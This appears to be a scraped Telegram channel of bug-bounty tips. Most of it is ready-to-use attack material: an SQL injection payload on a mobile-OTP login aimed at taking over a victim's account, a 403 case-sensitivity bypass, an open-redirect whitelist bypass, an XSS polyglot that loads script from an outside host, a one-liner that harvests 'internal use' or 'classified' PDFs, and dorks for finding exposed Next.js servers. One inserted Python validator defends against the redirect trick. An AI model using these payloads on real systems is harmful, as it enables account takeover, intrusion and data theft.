Brut Security – Telegram
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Open Redirect Bypasses
Case Insensitivity Vulnerability

/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 OK
SQL Injection to Account Takeover Manually :)
1. Enter a mobile number to log in and intercept the request
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200

2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --

2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
You can see the 200 response.

Finally, you can log in with the 1110 OTP and get access to the victim account :)

Credit- Kullai
Bypass open redirect whitelists using Chinese dots: 👀🔓🔍

%E3%80%82

Tip: Keep eyes on SSO redirects 😉🔀

credit: @adrielsec
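
A redirect validator hardened against this trick, as an added example that is not part of the original post: %E3%80%82 is the percent-encoded ideographic full stop (U+3002), which browsers treat as a dot when parsing a hostname, so the check has to canonicalize the host the same way before comparing it to the whitelist. The allowlist and sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Hypothetical allowlist of exact redirect hosts (constructed for this example).
ALLOWED_HOSTS = {"app.example.com", "login.example.com"}

# Code points that browsers' IDNA (UTS #46) processing maps to an ASCII dot.
DOT_EQUIVALENTS = str.maketrans({"\u3002": ".", "\uff0e": ".", "\uff61": "."})

# Plain letter-digit-hyphen labels separated by single dots.
LABELS = re.compile(r"[a-z0-9-]+(\.[a-z0-9-]+)*")


def canonical_host(url):
    """Return the host roughly as a browser would resolve it, or None if unusable."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return None
    # Only absolute http(s) URLs without userinfo are considered at all.
    if parts.scheme not in ("http", "https") or parts.username is not None:
        return None
    host = parts.hostname
    if not host:
        return None
    # Decode %XX first, then fold dot look-alikes: "%E3%80%82" becomes ".".
    host = unquote(host).translate(DOT_EQUIVALENTS).lower().rstrip(".")
    # Anything still outside plain labels is rejected rather than guessed at.
    return host if LABELS.fullmatch(host) else None


def is_allowed_redirect(url):
    """Exact-match the canonical host against the allowlist."""
    host = canonical_host(url)
    return host is not None and host in ALLOWED_HOSTS


if __name__ == "__main__":
    samples = [  # constructed sample inputs
        "https://app.example.com/home",
        "https://app.example.com%E3%80%82redirect-test.example/home",
        "https://app.example.com\u3002redirect-test.example/home",
    ]
    for s in samples:
        print(is_allowed_redirect(s), canonical_host(s), s)
```
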
Short #XSS Polyglot Payload

'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>


Note- It works for most HTML and JS injection scenarios.

Credit- knoxss.me (Not an AD)
🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨

📢Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains from various free passive resources.


🔗Link- https://github.com/RevoltSecurities/Subdominator
♨️One-liner to find sensitive PDF file♨️
cat apex-domains.txt | gau --subs --threads 16 | grep -Ea '\.pdf' | httpx -silent -mc 200 | while read -r i; do if curl -s "$i" | pdftotext -q - - | grep -Eaiq 'internal use|classified'; then echo "$i"; fi; done
🚨Gourlex🚨

📢It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.

🔗Link https://github.com/trap-bytes/gourlex
🚨CVE-2024-34351:Next.js SSRF in Server Actions🚨

📢 Security researchers at Assetnote have identified an SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.

📝Dorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"

🔗PoC: https://lnkd.in/gKbjiHVY

Stay vigilant and take necessary precautions to protect your applications.